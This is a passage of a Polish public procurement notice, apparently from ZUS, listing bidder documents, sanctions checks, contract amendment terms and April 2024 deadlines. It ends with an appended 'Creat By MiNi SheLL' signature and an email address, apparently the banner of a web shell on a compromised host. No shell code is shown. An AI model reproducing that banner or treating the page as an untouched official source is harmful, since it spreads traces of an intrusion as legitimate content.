aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 5 do SWZ, składa każdy z wykonawców.<br/>4.4.2.1.2.3. wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 4.4.2.1.1.1 SWZ, także oświadczenie podmiotu udostępniającego zasoby o aktualności informacji zawartych oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 5 do SWZ.<br/>(...)<br/>4.4.2.7. Weryfikacji braku zaistnienia podstaw wykluczenia, na podstawie art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę, zamawiający dokona na podstawie stosownych oświadczeń, sporządzonych zgodnie z wzorami, stanowiącymi załączniki do SWZ oraz odpowiednich, spośród następujących podmiotowych środków dowodowych:<br/>4.4.2.7.1. wykaz określony w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącym środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz. Urz. UE L 134 z 20.5.2006, str. 1, ze zm.) - pobrany przez zamawiającego z bazy danych mieszczącej się pod adresem internetowym: https://eur-lex.europa.eu ,<br/>4.4.2.7.2. wykaz określony w rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz. Urz. UE L 78 z 17.3.2014, str. 6, ze zm.) - pobrany przez zamawiającego z bazy danych mieszczącej się pod adresem internetowym: https://eur-lex.europa.eu ,<br/>4.4.2.7.3. lista osób i podmiotów, wobec których są stosowane środki, o których mowa w art. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę, prowadzona przez ministra właściwego do spraw wewnętrznych, publikowana w Biuletynie Informacji Publicznej na stronie podmiotowej ministra właściwego do spraw wewnętrznych - pobrana przez zamawiającego ze strony internetowej: https://www.gov.pl/web/mswia/lista-osob-i-podmiotow-objetych-sankcjami ,<br/>4.4.2.7.4. informacja z Centralnego Rejestru Beneficjentów Rzeczywistych - pobrana przez zamawiającego z bazy danych mieszczącej się pod adresem internetowym: https://crbr.podatki.gov.pl ,<br/>4.4.2.7.5. odpis z Centralnej Ewidencji i Informacji o Działalności Gospodarczej - pobrany przez zamawiającego z bazy danych mieszczącej się pod adresem internetowym: https://prod.ceidg.gov.pl , o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowy środek dowodowy , <br/>4.4.2.7.6. informacja z Krajowego Rejestru Sądowego - pobrana przez zamawiającego z bazy danych mieszczącej się pod adresem internetowym: https://ekrs.ms.gov.pl , o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowy środek dowodowy.&#34;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z SWZ:<br/>&#34;4.4.1.	Wymagane (...) podmiotowe środki dowodowe (...) składane wraz z ofertą.<br/>(...)<br/>4.4.1.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 3 do SWZ.<br/>(...)<br/>4.4.1.5. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 4 do SWZ, lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - o którym mowa w art. 118 ust. 3 ustawy Pzp oraz pkt 4.1.5 - 4.1.6 SWZ&#34;<br/><br/>&#34;4.4.2.	Wymagane podmiotowe środki dowodowe składane na wezwanie zamawiającego.<br/>4.4.2.1. Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>4.4.2.1.1. w celu potwierdzenia spełniania przez wykonawcę warunku udziału w postępowaniu dotyczącego zdolności zawodowej (kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia):<br/>4.4.2.1.1.1. w przypadku „części 1” zamówienia: wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, sporządzonego zgodnie z wzorem, stanowiącym załącznik nr 6 do SWZ,<br/>4.4.2.1.1.2. w przypadku „części 2” zamówienia: wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, sporządzonego zgodnie z wzorem, stanowiącym załącznik nr 6 do SWZ&#34;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zgodnie z SWZ:<br/><br/>&#34;2.1.6. Zamawiający, w przypadku części zamówienia, wyodrębnionych zgodnie z pkt 2.1.3 SWZ:<br/>(...)<br/>2.1.6.2. nie żąda złożenia przedmiotowych środków dowodowych,&#34; <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z SWZ:<br/>&#34;4.3.1. W skład kompletnej oferty wraz z załącznikami, wchodzą co najmniej:<br/>4.3.1.1. oferta, którą stanowi wypełniony formularz ofertowy, sporządzony zgodnie z wzorem stanowiącym załącznik nr 1 do SWZ,<br/>4.3.1.2. załączniki do oferty, które stanowią: oświadczenia oraz inne dokumenty składane wraz z ofertą, wskazane w pkt 4.4.1 SWZ.&#34;<br/><br/>&#34;4.4.1. Wymagane oświadczenia, (...) oraz inne dokumenty składane wraz z ofertą.<br/>4.4.1.1. Aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez zamawiającego w załączniku nr 2 do SWZ. Oświadczenie, o którym mowa, stanowi dowód potwierdzający brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>4.4.1.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 4.4.1.1 SWZ, składa wraz z ofertą każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>(...)<br/>4.4.1.4. W przypadku gdy wykonawca polega na zdolnościach podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o którym mowa w pkt 4.4.1.1 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunku udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby.&#34;<br/><br/>&#34;4.4.1.6. Dokumenty potwierdzające umocowanie.<br/>4.4.1.6.1. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy, złożenia wraz z ofertą, odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru.<br/>4.4.1.6.2. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt 4.4.1.6.1 SWZ, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>4.4.1.6.3. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 4.4.1.6.1 SWZ, zamawiający żąda od wykonawcy, złożenia wraz z ofertą, pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>4.4.1.6.4. Pkt 4.4.1.6.3 SWZ stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>4.4.1.6.5. Pkt 4.4.1.6.1 - 4.4.1.6.3 SWZ stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy oraz pkt 4.1.3 - 4.1.6 SWZ.<br/>4.4.1.6.6. W przypadku wskazania przez wykonawcę dostępności dokumentów, o których mowa w pkt 4.4.1.6.1 SWZ, pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający może żądać od wykonawcy przedstawienia tłumaczenia na język polski pobranych samodzielnie przez zamawiającego dokumentów.&#34; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ:<br/><br/>&#34;1.9.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W przypadku, o którym mowa:<br/>1.9.1.1. wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego,<br/>1.9.1.2. przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.9.2. Zamawiający wyjaśnia, że wspólnicy w spółce cywilnej, o której mowa w art. 860-875 Kodeksu cywilnego, są wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia (potocznie: „konsorcjum”).&#34;<br/><br/>&#34;4.1.1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek udziału w postępowaniu, dotyczący zdolności zawodowej (kwalifikacji zawodowych osób skierowanych przez wykonawcę do realizacji zamówienia). Warunek , o którym mowa w zdaniu poprzednim, zostanie uznany za spełniony, jeżeli wykonawca wykaże, że skieruje do realizacji zamówienia: (...)<br/>Uwaga nr 1: w odniesieniu do warunku dotyczącego kwalifikacji zawodowych, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Uwaga nr 2: w przypadku, o którym mowa powyżej (uwaga nr 1), wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 3 do SWZ.&#34;<br/><br/>&#34;4.4.1.2. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt. 4.4.1.1 SWZ, składa wraz z ofertą każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4.4.1.3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 3 do SWZ.&#34;<br/><br/>&#34;4.4.1.6.3. Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 4.4.1.6.1 SWZ, zamawiający żąda od wykonawcy, złożenia wraz z ofertą, pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>4.4.1.6.4. Pkt 4.4.1.6.3 SWZ stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.&#34;<br/><br/>&#34;4.4.2.1.2.2. w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, sporządzone zgodnie z wzorem, stanowiącym załącznik nr 5 do SWZ, składa każdy z wykonawców.&#34;<br/><br/>&#34;4.5.4. W przypadku gdy podmiotowe środki dowodowe, inne dokumenty lub dokumenty potwierdzające umocowanie do reprezentowania odpowiednio wykonawcy lub wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, zwane dalej „dokumentami potwierdzającymi umocowanie do reprezentowania”, zostały wystawione przez upoważnione podmioty inne niż wykonawca lub wykonawca wspólnie ubiegający się o udzielenie zamówienia, zwane dalej „upoważnionymi podmiotami”, jako dokument elektroniczny, przekazuje się ten dokument.&#34; <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z SWZ:<br/>&#34;10.1. Projektowane postanowienia umowy, stanowią dla:<br/>10.1.1. części 1 zamówienia - załącznik nr 7A do SWZ,<br/>10.1.2. części 2 zamówienia - załącznik nr 7B do SWZ.&#34;<br/><br/>&#34;10.3. W przypadku obu części zamówienia, zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp, przewiduje się, że umowa może ulec zmianie:<br/>10.3.1. w zakresie dotyczącym wynagrodzenia należnego wykonawcy:<br/>10.3.1.1. w przypadku zmiany stawki podatku od towarów i usług, jeżeli zmiany te nie będą miały wpływu na koszty wykonania umowy przez wykonawcę,<br/>10.3.1.2. zgodnie z art. 439 i 436 pkt 4 lit. b tiret pierwszy ustawy Pzp - w przypadku zmiany stawki podatku od towarów i usług, jeżeli zmiany te będą miały wpływ na koszty (dalej jako: „koszty osobowe” i/lub „koszty rzeczowe”), wykonania umowy przez wykonawcę,<br/>10.3.1.3. zgodnie z art. 439 i 436 pkt 4 lit. b tiret pierwszy ustawy Pzp - w przypadku zmiany stawki podatku akcyzowego, jeżeli zmiany te będą miały wpływ na koszty (dalej jako: „koszty osobowe” i/lub „koszty rzeczowe”), wykonania umowy przez wykonawcę,<br/>10.3.1.4. zgodnie z art. 439 i 436 pkt 4 lit. b tiret od drugiego do czwartego ustawy Pzp -w przypadku zmiany:<br/>10.3.1.4.1. wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy o minimalnym wynagrodzeniu za pracę;<br/>10.3.1.4.2. zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne;<br/>10.3.1.4.3. zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. z 2023 r. poz. 46 ze zm.)<br/>- jeżeli zmiany te będą miały wpływ na koszty (dalej jako: „koszty osobowe”), wykonania umowy przez wykonawcę,<br/>10.3.1.5. zgodnie z art. 439 ustawy Pzp - w przypadku zmiany:<br/>10.3.1.5.1. kosztów (ceny) materiałów i kosztów innych, niż koszty osobowe i koszt (cena) materiałów - związanych z wykonaniem przeglądów i konserwacji (dalej jako: „koszty rzeczowe”);<br/>10.3.1.5.2. kosztów innych, niż koszty osobowe i koszt (cena) materiałów, związanych z wykonaniem napraw (dalej jako: „koszty rzeczowe”);<br/>10.3.1.6. w przypadku wycofania z eksploatacji urządzenia/urządzeń, wymienionych w załączniku nr 1 do załącznika nr 7A do SWZ (część 1 zamówienia) oraz załączniku nr 1 do załącznika nr 7B do SWZ (część 2 zamówienia), spowodowanego jego stanem technicznym,<br/>10.3.2.	w zakresie określonym ustawą z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (Dz. U. z 2023 r. poz. 1327 ze zm.),<br/>10.3.3.	w przypadku zmiany osób, skierowanych przez wykonawcę do realizacji umowy, wskazanych w załączniku nr 6 do załącznika nr 7A do SWZ (część 1 zamówienia) oraz załączniku nr 6 do załącznika nr 7B do SWZ (część 2 zamówienia) <br/>10.4. W przypadku obu części zamówienia dopuszczalna jest również zmiana umowy w przypadkach określonych w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp.&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/zus</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-22 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Uzupełnienie do sekcji IV (Przedmiot zamówienia), pkt 4.2.10 Ogłoszenia.<br/><br/>Zgodnie z SWZ:<br/>&#34;Termin wykonania zamówienia: <br/>2.2.1.	Dla części 1:<br/>*24 miesiące od dnia 16 maja 2024 r. [uwaga: w przypadku zawarcia umowy w sprawie zamówienia publicznego przed dniem 16 maja 2024 r.],<br/>*24 miesiące od dnia zawarcia umowy w sprawie zamówienia publicznego [uwaga: w przypadku zawarcia umowy w sprawie zamówienia publicznego po dniu 15 maja 2024 r.].<br/>2.2.2.	Dla części 2:<br/>*24 miesiące od dnia 16 maja 2024 r. [uwaga: w przypadku zawarcia umowy w sprawie zamówienia publicznego przed dniem 16 maja 2024 r.],<br/>*24 miesiące od dnia zawarcia umowy w sprawie zamówienia publicznego [uwaga: w przypadku zawarcia umowy w sprawie zamówienia publicznego po dniu 15 maja 2024 r.].&#34;<br/><br/>2. Uzupełnienie do sekcji V (Kwalifikacja wykonawców) Ogłoszenia.<br/>Zgodnie z SWZ:<br/>„4.2.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na podstawie: <br/>4.2.1.1. art. 108 ust. 1 oraz art. 109 ust. 1 pkt 1 i 4 ustawy Pzp, <br/>4.2.1.2. art. 7 ust. 1 ustawy o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę.&#34;<br/><br/>3. Znaczenie pojęć użytych w Ogłoszeniu:<br/>3.1. „Instrukcja użytkownika SmartPZP” - „Instrukcja użytkownika Wykonawcy SMARTPZP PORTAL E-USŁUG”, dostępna na stronie internetowej: https://portal.smartpzp.pl/zus , w zakładce „e-learning” (opis odsyłacza: „Instrukcja obsługi Portalu e-Usług SmartPZP”),<br/><br/>3.2. „Kodeks pracy” - ustawa z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2023 r. poz. 1465),<br/><br/>3.3. „Platforma zakupowa” - narzędzie do komunikacji między zamawiającym a wykonawcami, umożliwiające realizację procesu związanego z udzielaniem zamówień publicznych przy użyciu środków komunikacji elektronicznej, zgodnie z art. 61 ust. 1 ustawy Pzp, służące w szczególności do składania ofert oraz przekazywania informacji i dokumentów lub oświadczeń, znajdujące się na stronie internetowej: https://portal.smartpzp.pl/zus,<br/><br/>3.4. „Regulamin SmartPZP” - „Regulamin korzystania z Portalu e-Usług SmartPZP”, dostępny na stronie internetowej: https://portal.smartpzp.pl/zus , w zakładce „e-learning” (opis odsyłacza: „Regulamin Portalu e-Usług”),<br/><br/>3.5. „RODO” - rozporządzenie Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 4.5.2016, str. 1, ze zm.),<br/><br/>3.6. „SWZ” - Specyfikacja warunków zamówienia wraz z załącznikami, stanowiącymi jej integralną część,<br/><br/>3.7. „ustawa o minimalnym wynagrodzeniu za pracę” - ustawa z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę (Dz. U. z 2020 r. poz. 2207 ze zm.),<br/><br/>3.8. „ustawa o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę” - ustawa z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2023 r. poz. 1497 ze zm.),<br/><br/>3.9. „ustawa Pzp” - ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 ze zm.),<br/><br/>3.10. „wykonawca” - osoba fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości prawnej, która oferuje na rynku wykonanie robót budowlanych lub obiektu budowlanego, dostawę produktów lub świadczenie usług lub ubiega się o udzielenie zamówienia, złożyła ofertę lub zawarła umowę w sprawie zamówienia publicznego.<br/><br/>4. Pozostałe informacje znajdują się w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com